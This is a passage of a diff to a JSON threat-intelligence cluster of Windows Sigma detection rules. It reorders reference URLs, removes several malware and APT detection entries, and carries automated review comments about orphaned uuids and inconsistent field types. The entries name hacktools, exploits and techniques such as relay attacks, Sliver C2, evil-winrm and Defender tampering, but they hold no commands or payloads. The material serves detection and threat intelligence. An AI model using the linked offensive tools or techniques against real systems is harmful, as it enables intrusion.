"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_by_ordinal.yml"
],
"tags": [
@@ -66130,9 +63436,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
"https://guides.lib.umich.edu/c.php?g=282942&p=1885348",
"https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_image.yml"
],
"tags": [
@@ -66199,10 +63505,10 @@
"logsource.product": "windows",
"refs": [
"https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/",
- "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar",
- "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic",
"https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/",
"https://nwgat.ninja/getting-system-information-with-wmic-on-windows/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic",
+ "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_discovery.yml"
],
"tags": [
@@ -66291,8 +63597,8 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings",
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml"
],
"tags": [
@@ -66396,40 +63702,6 @@
"uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e",
"value": "LOLBIN Execution Of The FTP.EXE Binary"
},
- {
- "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/11/20",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2019_1388.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege",
- "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068"
- ]
- },
- "related": [
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c",
- "value": "Exploiting CVE-2019-1388"
- },
{
"description": "Detects different hacktools used for relay attacks on Windows for privilege escalation",
"meta": {
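Review bot: this hunk deletes the entire "Exploiting CVE-2019-1388" element (uuid 02e0b2ea-a597-428e-b04a-af6a1a403e5c) together with its "related" link to dest-uuid b21c3b2d-02e6-45b1-980b-e69051040839, and nothing in the patch records why. A cluster uuid is what events and other galaxies reference, so removing it silently orphans those references; state in the commit message that the upstream Sigma rule was retired (if that is the reason) and list the removed uuids, so consumers can check for dangling references.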
@@ -66444,11 +63716,11 @@
"logsource.product": "windows",
"refs": [
"https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
- "https://www.localpotato.com/",
"https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire",
- "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes",
- "https://pentestlab.blog/2017/04/13/hot-potato/",
"https://github.com/ohpe/juicy-potato",
+ "https://www.localpotato.com/",
+ "https://pentestlab.blog/2017/04/13/hot-potato/",
+ "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml"
],
"tags": [
@@ -66468,74 +63740,6 @@
"uuid": "5589ab4f-a767-433c-961d-c91f3f704db1",
"value": "Potential SMB Relay Attack Tool Execution"
},
- {
- "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/",
- "https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_3cx_compromise_susp_update.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218",
- "attack.execution"
- ]
- },
- "related": [
- {
- "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a",
- "value": "Potential Compromised 3CXDesktopApp Update Activity"
- },
- {
- "description": "Detects suspicious inline VBScript keywords as used by UNC2452",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/03/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_vbscript_pattern.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61",
- "value": "Suspicious VBScript UN2452 Pattern"
- },
{
"description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.",
"meta": {
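Review bot: two elements go in this one hunk, "Potential Compromised 3CXDesktopApp Update Activity" (uuid e7581747-1e44-4d4b-85a6-0db0b4a00f2a, related to 457c7820-d331-465a-915e-42f85500ccc4) and "Suspicious VBScript UN2452 Pattern" (uuid 20c3f09d-c53d-4e85-8b74-6aa50e2f1b61, related to 9efb1ea7-c37b-4595-9640-b7680cd84279), and both cross-cluster relationships disappear with them; please enumerate them in the commit message with the other deletions. Minor: the deleted "value" spells the group "UN2452" while its "description" says "UNC2452"; moot once removed, but worth fixing if the element is ever reinstated.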
@@ -66623,11 +63827,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/Alh4zr3d/status/1580925761996828672",
"https://twitter.com/0gtweet/status/1628720819537936386",
"https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
- "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
"https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
- "https://twitter.com/Alh4zr3d/status/1580925761996828672",
+ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml"
],
"tags": [
@@ -66649,40 +63853,6 @@
"uuid": "98c5aeef-32d5-492f-b174-64a691896d25",
"value": "Service Security Descriptor Tampering Via Sc.EXE"
},
- {
- "description": "Detects potential QBot activity by looking for process executions used previously by QBot",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/10/01",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_qbot.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/",
- "https://twitter.com/killamjr/status/1179034907932315648",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040",
- "value": "Potential QBot Activity"
- },
{
"description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.",
"meta": {
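Review bot: the element removed here, "Potential QBot Activity" (uuid 4fcac6eb-0287-4090-8eea-2602e4c20040), carries "level": "critical", so unlike the refs reorders this is a visible change for anyone filtering the cluster by severity, and its "related" link to dfd7cc1d-e1d8-4394-a198-97c4cab8aa67 is lost as well; it belongs in the same list of retired uuids requested for the other removals.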
@@ -66738,9 +63908,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/gN3mes1s/status/1222095371175911424",
"https://twitter.com/gN3mes1s/status/1222088214581825540",
"https://twitter.com/gN3mes1s/status/1222095963789111296",
- "https://twitter.com/gN3mes1s/status/1222095371175911424",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml"
],
"tags": [
@@ -66807,46 +63977,6 @@
"uuid": "37e8d358-6408-4853-82f4-98333fca7014",
"value": "Remote Access Tool - NetSupport Execution From Unusual Location"
},
- {
- "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community",
- "creation_date": "2017/11/10",
- "falsepositive": "No established falsepositives",
- "filename": "proc_creation_win_malware_adwind.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
- "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_adwind.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.005",
- "attack.t1059.007"
- ]
- },
- "related": [
- {
- "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71",
- "value": "Adwind RAT / JRAT"
- },
{
"description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism",
"meta": {
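Review bot: beyond the removal of "Adwind RAT / JRAT" (uuid 1fac1481-2dbc-48b2-9096-753c49b4ec71, with two "related" entries), note the deleted line "falsepositive": "No established falsepositives": it is a bare string where every other element in this patch uses an array, so the generator is emitting a placeholder string instead of an empty list when the upstream field is absent. The deletion removes this instance, but the same generator behaviour survives elsewhere in the file, so fix it at the source and consumers will not need a type check on "falsepositive".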
@@ -66860,11 +63990,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356",
- "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script",
"https://twitter.com/mattifestation/status/1326228491302563846",
- "http://blog.sevagas.com/?Hacking-around-HTA-files",
"https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997",
+ "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script",
+ "http://blog.sevagas.com/?Hacking-around-HTA-files",
+ "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml"
],
"tags": [
@@ -67007,8 +64137,8 @@
"logsource.product": "windows",
"refs": [
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41",
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
"https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115",
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml"
],
"tags": "No established tags"
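Review bot: the unchanged context line "tags": "No established tags" shows the same schema inconsistency as "falsepositive" above: "tags" is an array in every neighbouring element but a free-form string here, which forces every consumer of this cluster to special-case the field. An empty array is the natural representation when the upstream rule has no tags; this patch does not touch the line, but the generator should be corrected so the next regeneration does.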
@@ -67062,8 +64192,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm",
"https://github.com/Hackplayers/evil-winrm",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml"
],
"tags": [
@@ -67131,8 +64261,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml"
],
"tags": [
@@ -67198,8 +64328,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
"https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options",
+ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powercfg_execution.yml"
],
"tags": [
@@ -67223,8 +64353,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml"
],
"tags": [
@@ -67257,9 +64387,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
"https://twitter.com/pabraeken/status/990717080805789697",
"https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA",
+ "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_runonce_execution.yml"
],
"tags": [
@@ -67292,9 +64422,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
- "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets",
+ "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/",
+ "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encode.yml"
],
"tags": [
@@ -67393,9 +64523,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.poweradmin.com/paexec/",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
+ "https://www.poweradmin.com/paexec/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml"
],
"tags": [
@@ -67473,8 +64603,8 @@
"refs": [
"https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
"https://twitter.com/gN3mes1s/status/1206874118282448897",
- "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
+ "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"
],
"tags": [
@@ -67743,8 +64873,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
+ "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_screensaver.yml"
],
"tags": [
@@ -67995,8 +65125,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/byt3bl33d3r/CrackMapExec",
"https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242",
+ "https://github.com/byt3bl33d3r/CrackMapExec",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml"
],
"tags": [
@@ -68071,8 +65201,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36",
"https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/",
+ "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml"
],
"tags": [
@@ -68105,10 +65235,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/",
"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
"https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad",
+ "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml"
],
"tags": [
@@ -68175,8 +65305,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/cube0x0",
"https://www.virustotal.com/gui/search/metadata%253ACube0x0/files",
+ "https://github.com/cube0x0",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml"
],
"tags": "No established tags"
@@ -68217,42 +65347,6 @@
"uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19",
"value": "HackTool - Impacket Tools Execution"
},
- {
- "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2018/09/03",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_apt27_emissary_panda.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/",
- "https://twitter.com/cyb3rops/status/1168863899531132929",
- "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt27_emissary_panda.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574.002",
- "attack.g0027"
- ]
- },
- "related": [
- {
- "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014",
- "value": "APT27 - Emissary Panda Activity"
- },
{
"description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.",
"meta": {
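Review bot: the deleted "APT27 - Emissary Panda Activity" element (uuid 9aa01d62-7667-4d3b-acb8-8cb5103e2014) is the only one in this patch tagged with an ATT&CK group id ("attack.g0027") in addition to a technique, and its "related" entry to e64c62cf-9cd7-4a14-94ec-cdaac43ab44b goes with it; record the removal and the reason in the commit message as for the other retired elements.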
@@ -68332,9 +65426,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49",
"https://github.com/sensepost/ruler",
+ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml"
],
"tags": [
@@ -68375,11 +65469,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/aceresponder/status/1636116096506818562",
- "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/",
- "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png",
- "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/",
"https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/",
+ "https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/",
+ "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/",
+ "https://twitter.com/aceresponder/status/1636116096506818562",
+ "https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml"
],
"tags": [
@@ -68400,27 +65494,6 @@
"uuid": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555",
"value": "Suspicious WebDav Client Execution"
},
- {
- "description": "Detects command line patterns used by BlackByte ransomware in different operations",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/02/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_blackbyte_ransomware.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/blackbyte-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_blackbyte_ransomware.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "999e8307-a775-4d5f-addc-4855632335be",
- "value": "Potential BlackByte Ransomware Activity"
- },
{
"description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.",
"meta": {
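Review bot: "Potential BlackByte Ransomware Activity" (uuid 999e8307-a775-4d5f-addc-4855632335be) is removed here; it had "tags": "No established tags" and therefore no "related" block, so no cross-cluster relationship is lost, but the uuid itself may still be referenced by events and should be listed with the other deletions.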
@@ -68434,8 +65507,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/nas_bench/status/1618021838407495681",
"https://twitter.com/nas_bench/status/1618021415852335105",
+ "https://twitter.com/nas_bench/status/1618021838407495681",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml"
],
"tags": [
@@ -68510,8 +65583,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html",
"https://redcanary.com/blog/child-processes/",
+ "https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml"
],
"tags": [
@@ -68578,8 +65651,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html",
"https://lolbas-project.github.io/lolbas/Binaries/Cmstp/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"
],
@@ -68622,10 +65695,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)",
"https://lolbas-project.github.io/lolbas/Binaries/Rpcping/",
- "https://twitter.com/vysecurity/status/873181705024266241",
"https://twitter.com/vysecurity/status/974806438316072960",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)",
+ "https://twitter.com/vysecurity/status/873181705024266241",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml"
],
"tags": [
@@ -68732,9 +65805,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/",
"https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
+ "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml"
],
"tags": [
@@ -68800,8 +65873,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
